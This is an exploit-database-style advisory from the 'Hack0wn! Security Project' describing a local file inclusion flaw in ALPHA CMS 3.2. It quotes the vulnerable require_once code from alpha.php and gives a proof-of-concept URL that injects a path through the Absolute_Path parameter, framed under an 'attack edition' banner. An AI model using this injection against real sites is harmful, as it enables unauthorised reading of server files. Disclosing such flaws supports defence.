1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 |
######################################################## fucking the Web Apps [attack edition] __________ /\_<code>\ /\ \__/\ \__/\ \ \ \ \L\_\_______\ \ \/'\ /\_\_____\ \ ,_\ \ \_____ \ \_\/\ \/\ \/'___\ \ , < \/\ \ /' _ </code>\/'_ <code>\ \ \ \/\ \_ </code>\/'__<code>\ \ \ \/\ \ \_\ \/\ \__/\ \ \</code>\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\__/ \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\ \/_/\/___/\/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/ /\____/ \_/__/ ____________ Hack0wn! Security Project /\ \__/\ \/\ \/\_\ \ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \_____ _____ ____ \ \ \ \ \ \ \/'__<code>\ \ '__</code>\ \ \__ \/\ '__<code>\/\ '__</code>\/',__\ \ \ \_/ \_\ \/\__/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, <code>\ \ </code>\___x___/\ \____\\ \_,__/\ \_\ \_\ \ ,__/\ \ ,__/\/\____/ '\/__//__/\/____/ \/___/\/_/\/_/\ \ \/\ \ \/\/___/ \ \_\ \ \_\ \/_/\/_/ [+]Title : ALPHA CMS Local File Inclusion Vulnerability [+]Version: 3.2 [+]Download: http://sourceforge.net/projects/alpha-cms/files/ [+]Author: eidelweiss [+]Metode: Local File Inclusion [+]CWE: 22 [*]Special to Syabilla_putri (I miss u so much to)[*] [!]Thank`s Fly To: [~] Jose Luis Gongora Fernandez a.k.a JosS - sp3x (securityreason) [~] exploit-db team [~] Inj3ct0r.com r0073r & 0x1D [Inj3ct0r Exploit Database] - [D]eal [C]yber ######################################################## Description: ALPHA CMS is an A.P.I - free (Open Archiecture), MVC based Content Management System. ALPHA CMS architecture gives the ability to easily create advanced web pages, add-ons or even other CMS. ALPHA CMS is based on PHP, Smarty, JavaScript and MySQL. -=[ Vuln C0de ]=- [!] File name: alpha.php // Create a new ALPHA CMS object $alpha = new ALPHA; // Include DTBS class require_once($alpha->Absolute_Path() . 'db.php'); // Include CTRL class require_once($alpha->Absolute_Path() . 'controler.php'); // Include UTL class require_once($alpha->Absolute_Path() . 'utilities.php'); // Include STY class require_once($alpha->Absolute_Path() . 'smarty.php'); -=[ Proof Of Concept ]=- http://127.0.0.1/alpha.php?Absolute_Path=[LFI] ######################=[E0F]=############################# |